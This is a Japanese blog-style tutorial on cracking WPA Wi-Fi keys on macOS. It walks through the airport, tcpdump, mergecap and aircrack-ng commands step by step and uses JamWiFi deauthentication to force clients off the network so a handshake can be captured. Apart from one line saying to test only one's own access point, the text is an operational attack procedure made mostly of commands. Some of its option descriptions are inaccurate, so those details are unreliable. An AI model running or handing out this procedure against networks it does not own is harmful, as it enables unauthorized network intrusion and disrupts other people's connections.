MacOS High Sierra以降、airportでキャプチャ解析をするとThe segmentation faultが発生しできません。これはairportが制限されたメモリ(つまり、ユーザメモリではない)を使おうとしたためOS側から警告がきたためです。High Sierra以降、OS使用メモリの割り当てが変更されたのだと思います。
本題に入りますが、現在の環境でキャプチャ解析するにはtcpdump(デフォルトで入っている)を使う方法が最も効率的だと思います。
aircrack-ngをmacで使ってWPAキーを割る方法を説明します。(自分の管理下にあるAPに対して行ってください。)上から順に実行してください。
$ airport -s
付近のAPを確認します、ターゲットを決めてください、 -Iオプションを使えば強度など、より詳しい情報が得られます。
$ sudo airport -z
wifiカードの初期化、ネットワークから切断する。root権限が必要なのでsudoしてください。
$ sudo airport -c[ターゲットのチャンネル]
例えばairport -c6のようにcとチャンネル数の間にスペースを入れないこと。
選択したチャンネルにキャプチャをシフトする。
$ sudo tcpdump -I -c 1 -i en0 -w 好きな名前(1).cap
tcpdumpを使いAPのビーコンをキャッチします。
オプションの説明:
-I wifiインターフェースをモニターモードに以降,これでキャプチャできるようになる。
-c この場合は1だが何回パケットを受け取ったらコマンドを終了するか選べる(この場合は一度パケット受診したら十分)。
-i インターフェースを選択macの場合,en0かen1です。ifconfigで確認してください。
-w キャプチャファイル書き出し、書き出すファイル名を決めてください。
$ sudo tcpdump -I -U -vvv -i en0 -w 好きな名前(2).cap
ハンドシェイクが終了するまでパケットを取得。
この際、JamWiFiを使い”Death Authentication” 強制認証を行うことで時間が短縮できます。
起動したらScanをおし、ターゲットネットワーク名を選択、そのあとにJamをクリックしDo It!で開始、Doneで終了してください。
aircrack-ngでの解析には、最低でも4パケット分必要です、4パケット以上溜まったらcontrol+Cを押して取得を終了してください。
オプションの説明:
-U 取得したROWパケットデータを出力。
-vvv より詳しい情報を出力。
$ mergecap -a -F pcap -w 好きな名前(3).cap 決めた名前(1).cap 決めた名前(2).cap
好きな名前(3).capにビーコンとハンドシェイクのパケットを統合し、好きな名前(3).cap作成。
好きな名前(3).capがairodump-ngやairportで得られるキャプチャファイルと同じものになります。
$ aircrack-ng -1 -a 1 -b ターゲットのbssid 取得した、好きな名前(3).capファイル -w ワードリスト.txt
めんどくさいの嫌いなら
$ aircrack-ng -w ワードリスト.txt -b ターゲットのbssid 取得した、好きな名前(3).cap
でも大丈夫です。
オプションの説明:
-1 PTWでキーを一度だけトライする。
-a -aの後に1でWEPキーに対する強制攻撃モード、2でWEP-PSKキーに対して。
aircrack-ngでブルートフォース攻撃(総当たり攻撃)を行うにはWordlistが必要です。
下記のにお勧めするものを貼ります。
一つ目
二つ目
三つ目
以上、出来るだけ詳しくMacOSでaircrack-ngを使う方法を説明しました。
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。